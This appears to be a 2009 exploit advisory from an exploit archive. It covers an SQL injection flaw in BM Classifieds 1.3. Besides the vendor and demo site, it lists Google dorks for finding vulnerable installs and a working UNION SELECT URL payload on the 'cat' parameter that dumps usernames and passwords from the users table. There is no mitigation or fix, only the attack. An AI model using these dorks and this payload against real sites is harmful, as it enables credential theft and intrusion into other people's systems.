id: 10078
date: 12/04/2009
title: BM Classifieds Ads SQL Injection Vulnerability
author: Dr.0rYX
cves: 

==============================================
BM Classifieds Ads SQL Injection Vulnerability
==============================================

 ***************************************************************************/
 
  [ Software Information ]
 
  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="
 
  **************************************************************************/
  [ Vulnerable File ]
 
  http://server/classifieds.php?cat=[N.A.S.T ]
 
  [ Exploit ]
 
  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users



#  0day.today [2023-03-26]  #